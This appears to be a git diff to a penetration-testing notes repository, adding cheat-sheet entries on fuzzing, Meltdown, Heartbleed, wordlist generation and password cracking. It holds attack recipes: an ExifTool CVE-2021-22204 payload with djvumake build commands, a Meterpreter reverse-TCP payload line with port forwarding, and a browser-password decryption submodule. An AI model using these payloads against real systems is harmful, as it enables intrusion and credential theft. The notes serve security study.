diff --git a/.gitmodules b/.gitmodules
index 1981ec3..c2daf29 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -70,3 +70,6 @@
 [submodule "exploit/web/content_security_policy/JSONBee"]
 	path = exploit/web/content_security_policy/JSONBee
 	url = https://github.com/zigoo0/JSONBee.git
+[submodule "post_exploitation/firefox_decrypt"]
+	path = post_exploitation/firefox_decrypt
+	url = https://github.com/unode/firefox_decrypt.git
diff --git a/enumeration/docs/wfuzz.md b/enumeration/docs/wfuzz.md
new file mode 100644
index 0000000..e60f9c3
--- /dev/null
+++ b/enumeration/docs/wfuzz.md
@@ -0,0 +1,6 @@
+# Wfuzz
+
+* Fuzz parameters
+```sh
+wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
+```
diff --git a/exploit/CPUs/meltdown.md b/exploit/CPUs/meltdown.md
new file mode 100644
index 0000000..931630c
--- /dev/null
+++ b/exploit/CPUs/meltdown.md
@@ -0,0 +1,26 @@
+# Meltdown
+
+* [PoC from IAIK](https://github.com/IAIK/meltdown.git)
+![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown")
+
+* Each page table entries has the following flag values
+    * SUP (user or kernel mode)
+    * READ
+    * WRITE
+
+* Flags are checked by the MMU
+
+* Pipelined steps of an instruction are the following
+    * Fetch
+    * Decode
+    * Execute
+    * Memory access
+    * Register write back
+
+* A pipeline can execute one of each steps concurrently every clock cycle.
+* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls.
+* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline.
+    * If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end.
+
+* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown. 
+
diff --git a/exploit/linux/exiftool.md b/exploit/linux/exiftool.md
new file mode 100644
index 0000000..ab274bf
--- /dev/null
+++ b/exploit/linux/exiftool.md
@@ -0,0 +1,12 @@
+# CVE-2021-22204
+
+* Craft an a payload and execute it via exiftool
+* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
+
+## Usage
+* Payload is `(metadata "\c${system('id')};")`
+```sh
+sudo apt install djvulibre-bin
+bzz payload payload.bzz
+djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
+```
diff --git a/exploit/ssl_tls/heartbleed.md b/exploit/ssl_tls/heartbleed.md
new file mode 100644
index 0000000..23cded6
--- /dev/null
+++ b/exploit/ssl_tls/heartbleed.md
@@ -0,0 +1,8 @@
+# Heartbleed
+
+* SSL V1.0.1 and V1.0.1f
+* Client sends msg, msglength
+* If msg is 0 and the msglength is longer, return from server is arbitrary memory content
+
+* [Heartbleed](https://heartbleed.com)
+
diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool
index c765a2e..eb411ea 160000
--- a/exploit/web/jwt/jwt_tool
+++ b/exploit/web/jwt/jwt_tool
@@ -1 +1 @@
-Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da
+Subproject commit eb411ea89b11df4485733201860619883a4f05e6
diff --git a/exploit/web/jwt_header b/exploit/web/jwt_header
deleted file mode 100644
index 2b81565..0000000
--- a/exploit/web/jwt_header
+++ /dev/null
@@ -1 +0,0 @@
-{"typ": "JWT", "alg": "HS256"}
diff --git a/exploit/web/xss.md b/exploit/web/xss.md
index c84a8ad..951611f 100644
--- a/exploit/web/xss.md
+++ b/exploit/web/xss.md
@@ -123,6 +123,7 @@ document.onkeypress = function (e) {
 ```
 ## Tricks and Tips
 * Use Polyglots
+* [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
 
 ## Protection Methods
 
@@ -133,3 +134,5 @@ There are many ways to prevent XSS, here are the 3 ways to keep cross-site scrip
 2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
 
 3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;
+
+
diff --git a/hashes/generate_wordlists.md b/hashes/generate_wordlists.md
index cd277ef..3d5fc8e 100644
--- a/hashes/generate_wordlists.md
+++ b/hashes/generate_wordlists.md
@@ -1,10 +1,34 @@
 # Generate Wordlists
 
+* [username_generator](https://github.com/therodri2/username_generator.git)
 * [CeWL](../enumeration/CeWL/README.md)
 * [Mentalist](https://github.com/sc0tfree/mentalist.git)
 * [lyricpass](https://github.com/initstring/lyricpass.git)
 * [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
 
+
+## Cupp
+
+* [cupp](https://github.com/Mebus/cupp.git)
+    * Interactive dialogue via `cupp.py -i`
+    * Wordlistdownload via `cupp.py -l`
+    * Connections to alecto DB via `-a`
+
+## crunch
+
+```sh
+crunch <minlen> <maxlen> <charPool> -o <output.file>
+```
+
+* Option `-t` specifies variable characters
+    * `@`, lower case alpha characters
+    * `,`, upper case alpha characters
+    * `%`, numeric characters
+    * `^`, special characters including space
+```sh
+crunch 8 8 -t passw%%rd
+```
+
 ## ttpassgen 
 * [ttpassgen](https://github.com/tp7309/TTPassGen.git)
 * Generate lists from the ground up
diff --git a/hashes/password_cracking/john.md b/hashes/password_cracking/john.md
index 5bda3f0..936f7f4 100644
--- a/hashes/password_cracking/john.md
+++ b/hashes/password_cracking/john.md
@@ -31,3 +31,7 @@ $[0-9]$[0-9]
 ### Existing Rules
 * `l33t`, l33tsp34k
 * `NT`, case mutation
+* Example for `best64`
+```sh
+john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
+```
diff --git a/hashes/password_guessing/standard_passwords.md b/hashes/password_guessing/standard_passwords.md
new file mode 100644
index 0000000..92a116b
--- /dev/null
+++ b/hashes/password_guessing/standard_passwords.md
@@ -0,0 +1,9 @@
+# Initial Passwords
+
+* Services and products sometimes have credentials set initially.
+
+* [default-password](https://default-password.info)
+* [datarecovery](https://datarecovery.com/rd/default-passwords/)
+
+
+
diff --git a/pentesting.md b/pentesting.md
index f37e0ee..a252e19 100644
--- a/pentesting.md
+++ b/pentesting.md
@@ -56,3 +56,14 @@ Authorized audit of security systems of computers and networks.
 * [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
 * [NIST](https://www.nist.gov/cyberframework)
 * [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
+
+## Testing Webapps
+
+* Two methods
+1. Every Page and its functions one by one
+2. Test by stages 
+    * Authorization
+    * Authentication
+    * Injection
+    * Client Side Controls
+    * Application Logic
diff --git a/pivoting.md b/pivoting.md
index b7fa757..1cb613e 100644
--- a/pivoting.md
+++ b/pivoting.md
@@ -144,3 +144,8 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
 ```
 * Exclude servers via `-x`, for example the target/gateway server
 
+### Meterpreter
+* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
+```sh
+portfwd add -l 22 -p 22 -r 127.0.0.1
+```
diff --git a/post_exploitation/firefox_decrypt b/post_exploitation/firefox_decrypt
new file mode 160000
index 0000000..b71a030
--- /dev/null
+++ b/post_exploitation/firefox_decrypt
@@ -0,0 +1 @@
+Subproject commit b71a030ae8c2c5253716243a1a9375bd36074be8
diff --git a/post_exploitation/priv_esc/docs/pspy.md b/post_exploitation/priv_esc/docs/pspy.md
new file mode 100644
index 0000000..1e532b4
--- /dev/null
+++ b/post_exploitation/priv_esc/docs/pspy.md
@@ -0,0 +1,5 @@
+# pspy 
+
+* Snoop processes withou root permissions
+* [Repo](https://github.com/DominicBreuker/pspy.git)
+
diff --git a/xor_key_file.py b/xor_key_file.py
new file mode 100644
index 0000000..c79d223
--- /dev/null
+++ b/xor_key_file.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python
+
+def xor(data, key):
+    keylen = len(key)
+    return bytearray((
+        (data[i] ^ key[i % keylen]) for i in range(0,len(data))
+    ))
+    
+
+if __name__ == "__main__":
+    data = bytearray(open('topsecret.txt', 'rb').read())
+    key = b'key'
+    res = xor(data, key)
+    print(res.decode())
+